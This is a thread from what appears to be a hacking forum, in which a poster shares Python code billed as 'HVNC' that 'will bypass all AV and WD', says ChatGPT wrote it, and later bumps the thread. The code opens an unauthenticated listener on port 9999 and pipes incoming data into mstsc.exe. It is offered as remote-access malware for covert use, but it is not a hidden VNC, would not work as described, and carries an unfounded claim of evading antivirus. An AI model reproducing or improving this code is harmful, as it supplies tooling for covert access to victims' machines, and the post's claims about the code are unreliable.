• 📢 Notice: Our community has moved to Zelo.cx! Visit us at Zelo.cx for the latest updates and discussions.

Basic HVNC code that will bypass all AV and WD

Sixnut

Divine
Divine
Sixnut Rep
0
0
0
Rep
982
Sixnut Vouches
0
0
0
Vouches
0
Posts
1,567
Likes
873
3 YEARS
3 YEARS OF SERVICE
[HIDE] # Start by importing necessary modules import socket import subprocess import os # Set up a listener on a specific port HOST = '0.0.0.0' PORT = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) # Accept incoming connections conn, addr = s.accept() # Create a subprocess to start the Remote Desktop tool p = subprocess.Popen(['C:\Windows\System32\mstsc.exe'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # Loop through incoming data and send to Remote Desktop tool while True: data = conn.recv(1024) p.stdin.write(data) p.stdin.flush() # Read output from Remote Desktop tool and send to client output = p.stdout.read() conn.send(output) # Check for errors and send to client error = p.stderr.read() if error: conn.send(error) # Close the connection conn.close()
[/HIDE]


You have to modify it a little to fulfill what you need but here you go I had chatgpt code it

Like and rep pls Pepelove
 

Juicyish

Divine
Divine
Juicyish Rep
0
0
0
Rep
998
Juicyish Vouches
0
0
0
Vouches
0
Posts
1,546
Likes
904
2 YEARS
2 YEARS OF SERVICE

Sixnut

Divine
Divine
Sixnut Rep
0
0
0
Rep
982
Sixnut Vouches
0
0
0
Vouches
0
Posts
1,567
Likes
873
3 YEARS
3 YEARS OF SERVICE
This is a bump
 

Sixnut

Divine
Divine
Sixnut Rep
0
0
0
Rep
982
Sixnut Vouches
0
0
0
Vouches
0
Posts
1,567
Likes
873
3 YEARS
3 YEARS OF SERVICE
This is a bump
 

48,736

38,247

238,888

Top